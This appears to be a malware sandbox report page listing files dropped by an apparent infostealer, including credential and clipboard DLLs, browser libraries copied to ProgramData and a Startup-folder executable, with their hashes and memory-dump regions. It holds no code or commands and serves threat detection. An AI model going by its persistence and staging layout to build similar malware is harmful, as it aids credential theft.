ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\{367965C5-3F8B-445a-9BAE-00AB4282D084}.tmp\360P2SP.dll

Filesize
824KB

MD5
fc1796add9491ee757e74e65cedd6ae7

SHA1
603e87ab8cb45f62ecc7a9ef52d5dedd261ea812

SHA256
bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60

SHA512
8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\{A1645043-442B-4f50-9F7E-2BDF4DF38903}.tmp

Filesize
3KB

MD5
b1ddd3b1895d9a3013b843b3702ac2bd

SHA1
71349f5c577a3ae8acb5fbce27b18a203bf04ede

SHA256
46cda5ad256bf373f5ed0b2a20efa5275c1ffd96864c33f3727e76a3973f4b3c

SHA512
93e6c10c4a8465bc2e58f4c7eb300860186ddc5734599bcdad130ff9c8fd324443045eac54bbc667b058ac1fa271e5b7645320c6e3fc2f28cc5f824096830de1

Download Submit
C:\Users\Admin\AppData\Local\hndtbrK.FEror\Files\RevokeTrace.txt

Filesize
483KB

MD5
b3aa972653b179649e0a0f1e96c12acd

SHA1
774122ffa078a35262d0c699d381d730249395a5

SHA256
6599a45d66eb8e03419c1ec10a1f026377322f8673b8e70a00ce7e4831ec0fed

SHA512
17d5d736f0a7c193a8c0d1254e7c551bc6abd743b13172e6c1d3e739a0b4ded01cf2063df062c5cf6560c5bdbc8d2371c8fb6f8f798b8efc422719424866aa36

Download Submit
C:\Users\Admin\AppData\Local\hndtbrK.FEror\sysInformation.txt

Filesize
809B

MD5
48197d50c242bd79b806f2a900f34daa

SHA1
13f2fcde36ad240fda016634073d74c275c13755

SHA256
3cda57d75198709767e056682b5dda9101276f15846eb7d168c6675ed9532dd7

SHA512
3fa7aa667dfac2ea04398c572a99de57e975adb0cfcaebc615f2231ebfbb419f96b4a405e2dee6e804c2707eb3c863b4296aab91447ac1e21e9f37e6bdb4ff12

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
8451a2c5daa42b25333b1b2089c5ea39

SHA1
700cc99ec8d3113435e657070d2d6bde0a833adc

SHA256
b8c8aedd84c363853db934a55087a3b730cf9dc758dea3dc3a98f54217f4c9d0

SHA512
6d2bad0e6ec7852d7b6d1a70a10285db28c06c37252503e01c52458a463582d5211b7e183ae064a36b60f990971a5b14f8af3aaaacc4226be1c2e3e0bf38af53

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

Filesize
162B

MD5
1b7c22a214949975556626d7217e9a39

SHA1
d01c97e2944166ed23e47e4a62ff471ab8fa031f

SHA256
340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

SHA512
ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

Download Submit
C:\Users\Admin\AppData\Roaming\IOktOFpaLKGPz.exe

Filesize
1000KB

MD5
5db00fb6ffdb44187b95918cb69ce6b4

SHA1
ba3a4c7b0e2de310a71d43020889296a97fbb9d4

SHA256
2416e5bfdf5fc88f9d7ceaf117cd1173370b357b8d4b5070f81f0df7a0253075

SHA512
6cfe9d1a435b447d79bb685c9da4e658183d4d1bf1af9e1900289bdec055677f59378d28197377cdff1a070c6300569800beacfed6111d205b8a3c74566bc63a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5D2QAYPA7X0UNP6XG5GB.temp

Filesize
6KB

MD5
0cda1df16044af17dc94213112db77e4

SHA1
0ee0956084749b82b7a863daf70d4ccefc9fc5d5

SHA256
82c8037b08dc7d419df2eee9ac7e8f66ce4011e106fc2396a9d624c74d29fd74

SHA512
b220c35a9ba5608fbf6c6c330d42a74d87e83188da6b1c00bab30c91a49526add7ededf3e8324c38e03e4d63e06abac9666f5329fe6611b3c7069037766e8280

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsApp6.exe

Filesize
125KB

MD5
5681f190a1d7c696efa487fa0100e96b

SHA1
b1e121e5f9bd86547cfbfd21b371d1f5ce31302d

SHA256
16fe58bfaee64cce35f0f9470ccfd136ee9916f5befb7e599e21cff53d4506d5

SHA512
ac0ff0752fc08e351dd7ea9be51b586f09e8d91beaa467a417f268e74e1ff2cb8b2bb2bb39271eb08e78dbf4ee7bdbe663bcd12c1950bd4c1a48e95bea062aa0

Download Submit
C:\Users\Admin\AppData\Roaming\NRxRXfYhgW.exe

Filesize
885KB

MD5
32b910a06c3169b599852dad6c181ed6

SHA1
94eb4980ef99a1153de7546d432288da54e4dd2d

SHA256
00b4678b94d884d5638bd270ed0c42f20697ebb1ba2746d14b45515da43bd3b7

SHA512
9730c8ab0e4cb1e9db981ef68590b0cb6fb4bd5c49078cef1a22cccd75de5f3eab395556c510af91346add9c21d407923edf6131ccb82069b785ae43a694df4a

Download Submit
C:\Users\Admin\AppData\Roaming\bgvwrev

Filesize
292KB

MD5
61d510bf7f8a1ab8175ea3e97fce511d

SHA1
da7f6c449ab2e36063338202959514e2f5df5f76

SHA256
ade81e5ce6c50a24074a17a06b4d4b6625a135ee08d2f505b71a691c5930a3cb

SHA512
2cd8d3b86f91ffdbd63446793b990fd7fdb08ac136b7f0e6ddffb3108dc71f3f0a9acc759e35ccc857a2f974d8ce59e68ec50619064bf7ff290e24fce8d5bcce

Download Submit
C:\Users\Admin\AppData\Roaming\tbvwrev

Filesize
328KB

MD5
8b75d4e0ecaaf72018e4ad13783a275d

SHA1
c323645cfbbc1be1d3e523155394c8f32dcf5951

SHA256
ae74817df2569f0619a180f569caf62d7ac5d5418f7a64cb4e21724f20d96dd6

SHA512
28e3858e2c7f5d91aae1460891e7c8c2de9e5dd11a88e19e0659d73adb2a895f7d96037d60476018353fee5e9fc379acc230b9386c27bfd828804578de0ca86b

Download Submit
C:\Users\Admin\AppData\Roaming\twvwrev

Filesize
291KB

MD5
f53ce99b1a630c58793eb10a5087c5b7

SHA1
555d90ec609d885f9daca48c905e122c65ee2f82

SHA256
c1ce748d732fc28bc1d03a9877c7257d6c76936eca6b212c87b3e83f0fd4d5b7

SHA512
2f629ef1146f8e637acc76bfd5cda8e9e349016e6d1d8f578c27f7edbbcc9de2d9e16d1ee4f1d4a908bd78b99e0c6cadfe775174d7fd66dcfc30032b9b45b312

Download Submit
C:\Users\Admin\AppData\Roaming\yBjeTclr.exe

Filesize
879KB

MD5
31b54d8b3a96f7346c0d96f79a5f70d2

SHA1
acb4a0b1304b532c3602a58a022b6195d7be4fae

SHA256
cb3964a3b6a2ee8bd2bdbc3a3b65306546cecec2deb444968ee8f33ce2c1a593

SHA512
2af0af05c006b71d338a57d6115f29af7c1daf799b897486237200b5b7d5f74f9cefce787d9a12f7a50a194db7359a3d59461f098e9c5aa2923f050e7a5beccc

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini

Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
C:\dan.exe

Filesize
115KB

MD5
2a531fb5a055bec266f11c721ee3deca

SHA1
59e420e47955066e9867cc9729fa686c900f623d

SHA256
d8b52233d360be77ce7dc53efa56b50c039c6e8d3e579b239cec8131c6a1c4a0

SHA512
000027101f5ea9bf6050344dc4b92161d6106924c4a7a14e68d317747dd6cec7cd42565c1c873aa97d62804a4aa3cdc934ba156af597a427021469823820b160

Download Submit
\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI51162\VCRUNTIME140.dll

Filesize
93KB

MD5
4a365ffdbde27954e768358f4a4ce82e

SHA1
a1b31102eee1d2a4ed1290da2038b7b9f6a104a3

SHA256
6a0850419432735a98e56857d5cfce97e9d58a947a9863ca6afadd1c7bcab27c

SHA512
54e4b6287c4d5a165509047262873085f50953af63ca0dcb7649c22aba5b439ab117a7e0d6e7f0a3e51a23e28a255ffd1ca1ddce4b2ea7f87bca1c9b0dbe2722

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI51162\_socket.pyd

Filesize
78KB

MD5
fd1cfe0f0023c5780247f11d8d2802c9

SHA1
5b29a3b4c6edb6fa176077e1f1432e3b0178f2bc

SHA256
258a5f0b4d362b2fed80b24eeabcb3cdd1602e32ff79d87225da6d15106b17a6

SHA512
b304a2e56829a557ec401c6fdda78d6d05b7495a610c1ed793d6b25fc5af891cb2a1581addb27ab5e2a6cb0be24d9678f67b97828015161bc875df9b7b5055ae

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI51162\python39.dll

Filesize
4.3MB

MD5
5cd203d356a77646856341a0c9135fc6

SHA1
a1f4ac5cc2f5ecb075b3d0129e620784814a48f7

SHA256
a56afcf5f3a72769c77c3bc43c9b84197180a8b3380b6258073223bfd72ed47a

SHA512
390008d57fa711d7c88b77937bf16fdb230e7c1e7182faea6d7c206e9f65ced6f2e835f9da9befb941e80624abe45875602e0e7ad485d9a009d2450a2a0e0f1f

Download Submit
\Users\Admin\AppData\Local\Temp\_MEI51162\select.pyd

Filesize
28KB

MD5
0e3cf5d792a3f543be8bbc186b97a27a

SHA1
50f4c70fce31504c6b746a2c8d9754a16ebc8d5e

SHA256
c7ffae6dc927cf10ac5da08614912bb3ad8fc52aa0ef9bc376d831e72dd74460

SHA512
224b42e05b4dbdf7275ee7c5d3eb190024fc55e22e38bd189c1685efee2a3dd527c6dfcb2feeec525b8d6dc35aded1eac2423ed62bb2599bb6a9ea34e842c340

Download Submit
memory/560-875-0x00000276E2D50000-0x00000276E2D58000-memory.dmp

Filesize
32KB

Download
memory/756-758-0x0000000000D10000-0x0000000000D26000-memory.dmp

Filesize
88KB

Download
memory/756-799-0x0000000007C90000-0x0000000007CA0000-memory.dmp

Filesize
64KB

Download
memory/1092-863-0x0000029949230000-0x000002994957A000-memory.dmp

Filesize
3.3MB

Download
memory/1092-895-0x0000029963BF0000-0x0000029963C00000-memory.dmp

Filesize
64KB

Download
memory/1092-871-0x000002994B170000-0x000002994B222000-memory.dmp

Filesize
712KB

Download
memory/1100-162-0x00000000025C0000-0x0000000002617000-memory.dmp

Filesize
348KB

Download
memory/1100-231-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1120-334-0x0000000005110000-0x0000000005120000-memory.dmp

Filesize
64KB

Download
memory/1120-338-0x0000000007770000-0x0000000007792000-memory.dmp

Filesize
136KB

Download
memory/1120-421-0x0000000007E10000-0x0000000007E2C000-memory.dmp

Filesize
112KB

Download
memory/1120-428-0x0000000008A40000-0x0000000008A8B000-memory.dmp

Filesize
300KB

Download
memory/1120-447-0x00000000087E0000-0x0000000008856000-memory.dmp

Filesize
472KB

Download
memory/1120-698-0x0000000005110000-0x0000000005120000-memory.dmp

Filesize
64KB

Download
memory/1120-694-0x0000000005110000-0x0000000005120000-memory.dmp

Filesize
64KB

Download
memory/1120-342-0x0000000007E80000-0x0000000007EE6000-memory.dmp

Filesize
408KB

Download
memory/1120-351-0x0000000008060000-0x00000000083B0000-memory.dmp

Filesize
3.3MB

Download
memory/1120-320-0x0000000005030000-0x0000000005066000-memory.dmp

Filesize
216KB

Download
memory/1120-658-0x0000000005110000-0x0000000005120000-memory.dmp

Filesize
64KB

Download
memory/1120-325-0x00000000077E0000-0x0000000007E08000-memory.dmp

Filesize
6.2MB

Download
memory/1120-648-0x0000000009C40000-0x0000000009CD4000-memory.dmp

Filesize
592KB

Download
memory/1120-620-0x0000000009930000-0x00000000099D5000-memory.dmp

Filesize
660KB

Download
memory/1120-597-0x000000007FA50000-0x000000007FA60000-memory.dmp

Filesize
64KB

Download
memory/1120-602-0x00000000098D0000-0x00000000098EE000-memory.dmp

Filesize
120KB

Download
memory/1120-598-0x00000000098F0000-0x0000000009923000-memory.dmp

Filesize
204KB

Download
memory/1120-332-0x0000000005110000-0x0000000005120000-memory.dmp

Filesize
64KB

Download
memory/1556-958-0x00000000067D0000-0x00000000067E0000-memory.dmp

Filesize
64KB

Download
memory/1556-980-0x00000000067D0000-0x00000000067E0000-memory.dmp

Filesize
64KB

Download
memory/2164-348-0x0000000140000000-0x00000001400AA000-memory.dmp

Filesize
680KB

Download
memory/2164-795-0x000001A13FA50000-0x000001A13FA60000-memory.dmp

Filesize
64KB

Download
memory/2164-367-0x000001A13FA50000-0x000001A13FA60000-memory.dmp

Filesize
64KB

Download
memory/2164-353-0x000001A159C30000-0x000001A159D40000-memory.dmp

Filesize
1.1MB

Download
memory/2212-941-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/2212-937-0x0000000004AB0000-0x0000000004AC0000-memory.dmp

Filesize
64KB

Download
memory/3196-207-0x0000000000510000-0x0000000000526000-memory.dmp

Filesize
88KB

Download
memory/3612-523-0x0000000006A60000-0x0000000006A70000-memory.dmp

Filesize
64KB

Download
memory/3612-151-0x000000000B660000-0x000000000B6C6000-memory.dmp

Filesize
408KB

Download
memory/3612-152-0x0000000006A60000-0x0000000006A70000-memory.dmp

Filesize
64KB

Download
memory/3612-143-0x000000000B5C0000-0x000000000B652000-memory.dmp

Filesize
584KB

Download
memory/3612-142-0x000000000BA20000-0x000000000BF1E000-memory.dmp

Filesize
5.0MB

Download
memory/3612-135-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/3612-150-0x0000000009170000-0x000000000917A000-memory.dmp

Filesize
40KB

Download
memory/3664-527-0x0000000004130000-0x000000000420C000-memory.dmp

Filesize
880KB

Download
memory/3896-128-0x00000000024D0000-0x00000000024D9000-memory.dmp

Filesize
36KB

Download
memory/3896-211-0x0000000000400000-0x0000000002367000-memory.dmp

Filesize
31.4MB

Download
memory/4128-121-0x000000001B040000-0x000000001B050000-memory.dmp

Filesize
64KB

Download
memory/4128-330-0x000000001B040000-0x000000001B050000-memory.dmp

Filesize
64KB

Download
memory/4128-120-0x00000000003E0000-0x00000000003E8000-memory.dmp

Filesize
32KB

Download
memory/4184-888-0x000001CC34050000-0x000001CC3406A000-memory.dmp

Filesize
104KB

Download
memory/4520-841-0x0000000000840000-0x0000000000841000-memory.dmp

Filesize
4KB

Download
memory/4608-951-0x0000000000C60000-0x0000000000C70000-memory.dmp

Filesize
64KB

Download
memory/4608-954-0x0000000000C60000-0x0000000000C70000-memory.dmp

Filesize
64KB

Download
memory/4852-200-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-190-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-228-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-226-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-224-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-222-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-220-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-234-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-218-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-216-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-214-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-209-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-562-0x0000000006980000-0x0000000006990000-memory.dmp

Filesize
64KB

Download
memory/4852-206-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-204-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-202-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-559-0x0000000006980000-0x0000000006990000-memory.dmp

Filesize
64KB

Download
memory/4852-198-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-196-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-194-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-192-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-230-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-186-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-188-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-183-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-181-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-179-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-177-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-176-0x0000000006930000-0x0000000006971000-memory.dmp

Filesize
260KB

Download
memory/4852-169-0x0000000006980000-0x0000000006990000-memory.dmp

Filesize
64KB

Download
memory/4852-165-0x0000000006980000-0x0000000006990000-memory.dmp

Filesize
64KB

Download
memory/4852-164-0x00000000023E0000-0x0000000002429000-memory.dmp

Filesize
292KB

Download
memory/4852-163-0x0000000006930000-0x0000000006976000-memory.dmp

Filesize
280KB

Download
memory/4852-557-0x0000000006980000-0x0000000006990000-memory.dmp

Filesize
64KB

Download
memory/4852-159-0x0000000004200000-0x0000000004248000-memory.dmp

Filesize
288KB

Download
memory/4960-948-0x0000000005380000-0x0000000005390000-memory.dmp

Filesize
64KB

Download
memory/4960-944-0x0000000005380000-0x0000000005390000-memory.dmp

Filesize
64KB

Download
memory/5008-309-0x0000020453B10000-0x0000020453BBC000-memory.dmp

Filesize
688KB

Download
memory/5008-319-0x0000020453BC0000-0x0000020453C52000-memory.dmp

Filesize
584KB

Download
memory/5008-322-0x0000020453C80000-0x0000020453CA2000-memory.dmp

Filesize
136KB

Download
memory/5008-306-0x00000204538B0000-0x00000204538C0000-memory.dmp

Filesize
64KB

Download
memory/5008-300-0x00000204538C0000-0x0000020453A10000-memory.dmp

Filesize
1.3MB

Download
memory/5008-262-0x0000020439350000-0x0000020439510000-memory.dmp

Filesize
1.8MB

Download